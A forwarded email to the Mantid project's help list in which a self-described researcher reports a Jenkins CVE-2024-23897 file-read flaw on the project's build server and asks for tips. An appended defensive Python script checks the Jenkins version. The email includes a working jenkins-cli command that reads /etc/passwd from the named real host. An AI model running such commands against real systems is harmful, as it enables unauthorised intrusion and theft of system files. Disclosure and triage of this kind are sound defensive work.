Forwarding onto Mantid DevOps. Could be spam but best to double check.


From: דוד בוזגלו via Mantid-help <mantid-help@mantidproject.org>
Sent: 27 January 2024 14:28
To: Mantid Help <mantid-help@mantidproject.org>
Subject: [Mantid-help] CVE-2024-23897 - builds.mantidproject.org - Jenkins Arbitrary file read vulnerability


Hello,

My name is David and I am a security researcher.

Jenkins CVE-2024-23897 Arbitrary file read vulnerability through the CLI can lead to RCE.


URL: https://builds.mantidproject.org


java -jar ./jenkins-cli.jar -s https://builds.mantidproject.org/ connect-node "@/etc/passwd"


Read more:

https://securityonline.info/cve-2024-23897-cvss-9-8-critical-jenkins-security-vulnerability-rce-possible/

https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html

https://github.com/jenkinsci/jenkins/commit/554f03782057c499c49bbb06575f0d28b5200edb


Liked my bug? Buy me a coffee (or more likely a beer x2)

https://www.paypal.com/paypalme/bugbounty1/150USD

https://www.paypal.com/paypalme/bugbounty1/75USD

https://www.buymeacoffee.com/bugbounty


Help me to continue to protect others' information.
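A defender-side triage check for the report above, added here as an example and not code from the reporter or the Mantid project. It relies on two facts from the Jenkins side: the server advertises its version in the `X-Jenkins` response header, and the fix for CVE-2024-23897 shipped in weekly 2.442 and LTS 2.426.3 (Jenkins security advisory of 2024-01-24); the assumption that a three-component version is an LTS release is the usual Jenkins numbering convention, and the sample headers are constructed.

```python
"""Triage check: is a Jenkins version still exposed to CVE-2024-23897?

Added example, not the reporter's or the project's code. Jenkins sends its
version in the ``X-Jenkins`` header; the fix landed in weekly 2.442 and
LTS 2.426.3, so anything older on the respective line is unpatched.
"""
from __future__ import annotations

import re
import sys
import urllib.request

FIXED_WEEKLY = (2, 442)      # first weekly release with the fix
FIXED_LTS = (2, 426, 3)      # first LTS release with the fix


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '2.426.2' or '2.441' into a comparable tuple; reject junk."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Jenkins version: {text!r}")
    return tuple(int(p) for p in m.groups() if p is not None)


def is_vulnerable(version: str) -> bool:
    """True if the version predates the fix on its release line.

    Assumption: three components (2.426.2) means LTS, two (2.441) means weekly.
    """
    v = parse_version(version)
    fixed = FIXED_LTS if len(v) == 3 else FIXED_WEEKLY
    return v < fixed


def version_from_headers(headers) -> str | None:
    """Case-insensitive lookup of X-Jenkins in a mapping of response headers."""
    for name, value in headers.items():
        if name.lower() == "x-jenkins":
            return value
    return None


def check_server(url: str) -> bool | None:
    """Fetch the landing page of your own instance; None if no header seen."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        version = version_from_headers(resp.headers)
    return None if version is None else is_vulnerable(version)


if __name__ == "__main__":
    # Constructed sample headers, shaped like a real Jenkins response.
    sample = {"Content-Type": "text/html", "X-Jenkins": "2.426.2"}
    print(is_vulnerable(version_from_headers(sample)))  # True: needs 2.426.3
    if len(sys.argv) > 1:
        print(check_server(sys.argv[1]))
```

The header check is only a first pass for inventory; the advisory's guidance (upgrade, or disable CLI access until the upgrade lands) is the actual mitigation.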